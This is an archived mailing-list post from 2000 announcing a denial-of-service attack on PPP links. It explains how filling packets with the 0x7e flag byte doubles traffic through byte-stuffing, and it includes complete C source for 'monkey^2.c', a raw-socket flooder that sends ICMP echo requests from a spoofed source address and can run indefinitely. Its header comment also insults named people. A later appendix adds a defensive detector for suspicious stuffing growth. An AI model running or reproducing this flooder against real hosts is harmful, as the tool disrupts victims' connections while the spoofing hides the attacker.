Vulnerability Development mailing list archives

New DOS attack vs ppp links


From: bahz0r () YAHOO COM (cat catzor)
Date: Fri, 21 Jul 2000 03:51:35 -0700


------
USSR Research.

Concept:
PPP uses a specific flag byte to signify the beginning and end of a ppp frame. If this byte is contained in the data portion of the frame it is escaped by two other bytes. Crafting a packet filled with the flag byte doubles the amount of data which goes through the ppp link, as well as consumes resources while the escaped bytes are unescaped.

Problem:
"Problem" (and I do say "problem" because I see no way around this) lies within ppp itself, on link level. It is irrelevant which protocol is used to deliver data to the target machine.

Solution:
Disallow icmp traffic to your ppp connected machines (before the ppp link), or filter packets which contain a suspicious number of the ppp flag byte (0x7e).

Technical:
A typical ppp frame looks like this:
[FLAG (7e)][ADDR][CONTROL][PROTOCOL][INFORMATION][CRC][FLAG (7e)]
Note: most implementations don't actually transmit addr and control fields (since these are static). If the flag character is contained within the [INFORMATION] portion of the frame, it is replaced by the sequence [0x7d 0x5e]. So if an incoming packet contains one 7e byte, it will get converted to two other bytes when it enters the ppp link, hence the flood will double. The attached code uses icmp echo request to deliver the data to the target. If the target also replies to this packet (as it should) it will once again amplify the flood. In other words, for each byte the attacker sends, the target gets hit with two, and replies with two. The attached code supports spoofing of the originating IP address.

NOTE: by default ppp will also escape any byte with value less than 0x20 (i.e. any ASCII control character), so while simply filtering suspicious amounts of 0x7e might save your ppp users from this particular piece of code, modifying the attack is as simple as changing the data character.

Code:
Code developed by xaiou.
Concept developed by xaiou, reviewed by USSR Research.

File Name: monkey^2.c
Platform:  linux 2.x
Compile:   gcc -o monkey^2 monkey.c
Suggested: ansi color capable terminal.

IMPORTANT: in order for this to do what it's supposed to do, it is imperative that the attacker NOT be on a ppp link himself. If one was to attack a ppp link FROM a ppp link, it would prove completely useless (because you'd be sending 2 bytes and the target would be getting hit by two; you might as well ping -f).

---------------------- begin monkey^2.c ----------------------------------

/****************************************************************************
 * Monkey Squared Dot Cee - only thing better than a monkey....             *
 * is monkey squared. - me myself and xaiou.                                *
 * USSR Research Team - Concept and code by xaiou. Checksum function        *
 * stolen from smurf by TFreak.                                             *
 * Concept:  ppp uses a special byte, namely 0x7e to designate start and    *
 * end of a packet.  If this byte appears in data, it is escaped with       *
 * 0x7d and 0x5e.  So in conclusion, sending a spoofed icmp echo request    *
 * to a target host on ppp link, loaded with 0x7e, first of all, the load   *
 * doubles when it hits the ppp link, and if that wasn't enough, the victim *
 * responds with this packet, again doubling the load.  So for each 1 byte  *
 * you send victim receives two and sends out two.  Not bad, eh?  Anyways   *
 * the only solution I see to this is to block icmp echo requests to your   *
 * ppp linked friends.                                                      *
 *                                                                          *
 * Props: USSR Research, Neounix.com, superluck, optiklenz,                 *
 *        Richard Stevens (you're my hero), powerbox, armoredtech           *
 *        w00w00 team (j00 ar3 3rl33t), all the people in #c (i love you    *
 *        guys!), aliensex, OGL, IanH.  Also TFreak (i hope you don't mind  *
 *        me borrowing your checksum function.) Also phrack and route       *
 *        (you are my other hero), BlackIC for the coloreds. DJ Jeff from   *
 *        the 418 club in mineapolis, and that one stripper...              *
 *                                                                          *
 * Morons: digiebola ("hacker" who can't code hello world) and his slut     *
 *         "girlfriend" (the girl part is debatable). All irc hookers,      *
 *         people who run NT,  people who buy NT, people who make NT,       *
 *         People who think they're LOU (you are not lou damn it)           *
 *                                                                          *
 * --------------------- USSR Research Team 2000 --------------------------*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#define GREEN "\033[32m"
#define RED   "\033[31m"
#define GRAY  "\033[37m"

unsigned short in_chksum (u_short *addr, int len); /* stolen from smurf */
void ussrinfo(void);
void usage(void);

int main (int ARGC, char *ARGV[]) {
  struct iphdr *iphdr;
  struct icmphdr *icmphdr;
  struct sockaddr_in sockaddress;
  char *packet;
  int raw_socket;
  int i;
  int no_packetsz;
  int sizeofpacket;
  char *data;

  ussrinfo();

  if(ARGC != 5) { usage(); exit(0); }
  sizeofpacket = atoi(ARGV[4]);

  /* payload: nothing but the ppp flag byte */
  data = (char *)malloc(sizeofpacket);
  if (data == NULL) { perror("malloc"); exit(-1); }
  memset(data, 0x7e, sizeofpacket);

  /* name the socket */
  sockaddress.sin_addr.s_addr = inet_addr(ARGV[2]);
  sockaddress.sin_family = AF_INET; /* internet socket */
  sockaddress.sin_port = 0;         /* it's icmp...no port */
  if ((raw_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror("getting socket");
    exit(-1);
  }

  /* calloc so the id/sequence fields we never set start out as zero */
  packet = calloc(1, sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeofpacket);
  if (packet == NULL) { perror("calloc"); exit(-1); }
  iphdr = (struct iphdr *)packet; /* ip now refers to packet.iphdr */
  icmphdr = (struct icmphdr *) (packet + sizeof(struct iphdr));
  /* copy the 0x7e payload in behind the icmp header */
  memcpy(packet + sizeof(struct iphdr) + sizeof(struct icmphdr), data, sizeofpacket);

  iphdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeofpacket);
  iphdr->ihl = 5;       /* ip header length in 32 bit words */
  iphdr->version = 4;
  iphdr->ttl = 255;     /* maximum hops */
  iphdr->tos = 0;
  iphdr->frag_off = 0;  /* data offset */
  iphdr->protocol = IPPROTO_ICMP;
  iphdr->saddr = inet_addr(ARGV[1]);           /* fake source */
  iphdr->daddr = sockaddress.sin_addr.s_addr;  /* real destination */
  iphdr->check = in_chksum((u_short *)iphdr, sizeof(struct iphdr)); /* checksum */
  icmphdr->type = 8;    /* echo request */
  icmphdr->code = 0;    /* icmp subcode...screw it */
  icmphdr->checksum = in_chksum((u_short *)icmphdr, sizeof(struct icmphdr) + sizeofpacket);

  printf(RED"Now flooding %s\n", ARGV[2]);
  no_packetsz = atoi(ARGV[3]);
  i=0;
  while(1)  {
    printf(GRAY".");
    sendto(raw_socket, packet, (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeofpacket), 0,
           (struct sockaddr *)&sockaddress, sizeof(struct sockaddr));
    if( (i > no_packetsz) && (no_packetsz != 0)) { break; }
    i++;
  }
  printf(GREEN"\nMonkey Complete...monkey squared complete.\n"GRAY);
  return 1;
}

unsigned short in_chksum (u_short *addr, int len)
{
  register int nleft = len;
  register int sum = 0;
  u_short answer = 0;

  /* sum 16-bit words */
  while (nleft > 1) {
    sum += *addr++;
    nleft -= 2;
  }

  /* mop up an odd trailing byte, if any */
  if (nleft == 1) {
    *(u_char *)(&answer) = *(u_char *)addr;
    sum += answer;
  }

  /* fold the 32-bit sum into 16 bits and take the one's complement */
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return(answer);
}

void ussrinfo(void) {
  printf("---------------------------------------------------------------\n");
  printf(GREEN"| Underground Security Systems Research Proudly Presents:     |\n\n");
  printf("| monkey squared dot cee - ppp linkz ...the end is near.      | \n");
  printf("| By: xaiou (tarik).                                          | \n");
}

void usage(void) {
  printf(RED"| Usage: monkey^2 source destination number (0 for infinite) size |\n");
  printf(GRAY"|---------------------USSR Research --------------------------|\n");
}

------------------------------------ end monkey^2.c ------------------------
EOF
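As an added illustration that is not part of the original post or the USSR code, the following stand-alone C reconstructs the RFC 1662 octet stuffing the post describes: it computes the on-the-wire size of an information field for a given ACCM (the default escapes every octet below 0x20, as the NOTE above says), performs the 0x7d / XOR 0x20 escape, and turns the "filter packets which contain a suspicious number of the ppp flag byte" idea from the Solution section into a growth-ratio check that also covers the control-character variant. Function names and the percentage threshold are my own choices, not anything from the post.

```c
#include <stddef.h>
#include <stdint.h>
/* RFC 1662 octet stuffing on async PPP links. */
#define PPP_FLAG   0x7e
#define PPP_ESCAPE 0x7d
#define PPP_DEFAULT_ACCM 0xffffffffu  /* default: escape every octet < 0x20 */

/* 1 if octet c must be escaped on a link using this ACCM, else 0. */
static int ppp_needs_escape(uint8_t c, uint32_t accm)
{
    if (c == PPP_FLAG || c == PPP_ESCAPE) return 1;
    return c < 0x20 && (accm & (1u << c)) != 0;
}

/* On-the-wire size of an information field after stuffing: each escaped
 * octet becomes two, so a buffer of pure 0x7e exactly doubles. */
size_t ppp_stuffed_len(const uint8_t *buf, size_t len, uint32_t accm)
{
    size_t out = 0;
    for (size_t i = 0; i < len; i++)
        out += ppp_needs_escape(buf[i], accm) ? 2 : 1;
    return out;
}

/* Stuff in[len] into out[cap]; returns bytes written, 0 if it does not fit.
 * 0x7e -> 0x7d 0x5e, 0x7d -> 0x7d 0x5d, 0x03 -> 0x7d 0x23 (octet XOR 0x20). */
size_t ppp_stuff(const uint8_t *in, size_t len, uint8_t *out, size_t cap,
                 uint32_t accm)
{
    size_t o = 0;
    for (size_t i = 0; i < len; i++) {
        int esc = ppp_needs_escape(in[i], accm);
        if (o + 1 + esc > cap) return 0;
        if (esc) { out[o++] = PPP_ESCAPE; out[o++] = in[i] ^ 0x20; }
        else out[o++] = in[i];
    }
    return o;
}

/* Filter rule from the post's "Solution": flag a payload whose stuffed size
 * would grow by more than max_growth_pct percent (50 means beyond 1.5x).
 * Counting every escapable octet, not just 0x7e, also covers the
 * control-character variant the NOTE warns about (threshold is my choice). */
int ppp_payload_suspicious(const uint8_t *buf, size_t len, uint32_t accm,
                           unsigned max_growth_pct)
{
    if (len == 0) return 0;
    size_t grow = ppp_stuffed_len(buf, len, accm) - len;
    return grow * 100 > (size_t)max_growth_pct * len;
}
```

Passing an ACCM of 0 models a link that negotiated no control-character escaping, in which case only 0x7e and 0x7d count.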


Attachment: monkey^2.c (application/x-unknown)

